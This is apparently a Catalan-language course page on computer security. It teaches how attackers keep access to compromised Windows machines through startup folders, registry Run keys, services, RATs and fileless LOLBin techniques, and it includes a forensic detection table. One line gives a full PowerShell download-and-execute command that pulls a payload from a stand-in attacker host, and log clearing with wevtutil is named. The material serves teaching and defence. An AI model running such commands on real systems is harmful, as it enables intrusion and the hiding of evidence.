M05: Seguretat Informàtica · Unitat 4

Persistències i Backdoors
The Eternal Ghost

Garantint el manteniment de l'accés en sistemes compromesos

TEORIA · MANTENIMENT DE L'ACCÉS

SECCIÓ 3: Persistències i Portes del Darrere

Un cop compromès el sistema, l'atacant ha d'assegurar-se que no perdrà l'accés si l'usuari reinicia l'ordinador, tanca la sessió o canvia la contrasenya. Aquest conjunt de tècniques s'anomena Persistència.

Concepte de Persistència
Tàctica: Manteniment de l'accés images/teoriaM03/rce-exploit.png
Explorar tàctiques: MITRE ATT&CK - Persistence

🔑 El concepte de Persistència

Mantenir el control requereix mecanismes que s'auto-executin. L'objectiu és trobar un equilibri entre la visibilitat (ser fàcil de detectar per un administrador) i la robustesa (resistir a neteges del sistema).

3.1 Tècniques de Persistència Tradicionals

Es basen a utilitzar funcionalitats legítimes de Windows per carregar codi maliciós en l'arrencada:

Carpeta Startup

Col·locar scripts a \AppData\Roaming\...\Startup. Senzill però fàcil de detectar.

Registre Autorun

Claus Run a HKCU o HKLM que executen programes al iniciar sessió.

Serveis de Windows

Crear serveis (sc create) amb inici automàtic per rebre shells com a SYSTEM.

👻 3.2 Portes del Darrere: RAT (Remote Access Trojans)

Un RAT és un programari maliciós que permet el control remot total d'un sistema.

RAT vs. RAT: Eines legítimes vs Malicioses

La diferència entre una eina d'administració (PsExec, TeamViewer) i un troià (NjRAT, RemcosRAT) és la intenció i el consentiment.

Funcionalitats: Keyloggers, captura de pantalla, control de càmera i el famós Watchdog (procés que reinicia l'implant si es tanca).

Anàlisi de RAT
Anàlisi: Comportament d'un RAT modern images/teoriam05/passwords_search.png
Article: Evolució dels RATs — Mandiant

🚀 3.3 LOLBins i Atacs Fileless (Malware sense fitxers)

Per evitar els antivirus que busquen fitxers .exe, s'utilitzen LOLBins (Living Off the Land Binaries): eines legítimes del propi sistema.

Exfiltració i Beaconing

curl: Utilitzar la comanda nativa per enviar dades sensibles capturades cap a l'exterior.

Beaconing (C2): Tasques programades (schtasks) que "truquen a casa" per rebre ordres, imitant el trànsit web normal.

Execució en memòria (PowerShell)

Descarregar i executar codi directament a la RAM sense tocar el disc dur:

powershell -Command "IEX(New-Object Net.WebClient).DownloadString('http://kali/payload.ps1')"
Projecte LOLBAS

Llista completa de binaris de Windows utilitzables per a l'atac.

Consultar: lolbas-project.github.io

⚖️ Anàlisi de Detecció Forense

Mètode Detecció Rastre Forense
Servei (SC) Alta Clau a HKLM\...\Services
Tasca Programada Mitjana Artefactes a C:\Windows\System32\Tasks
Fileless (RAM) Baixa Logs de PowerShell
Timestomping Molt Baixa Falsificació de metadades de temps
🚨

Info Callout: L'Event 1102 i el Crit del Silenci

Esborrar els logs amb wevtutil cl Security sembla bona idea, però genera automàticament l'Event ID 1102. Per al Blue Team, aquest esdeveniment és una alarma vermella: algú està intentant amagar les seves petjades.

🗂️ Resum de la Secció 3

Objectiu

Mantenir l'accés permanent al sistema.

Mètodes

Registre Run, Tasques Programades, Serveis i C2.

Sigil

Ús de LOLBins (curl, powershell) i Fileless Malware.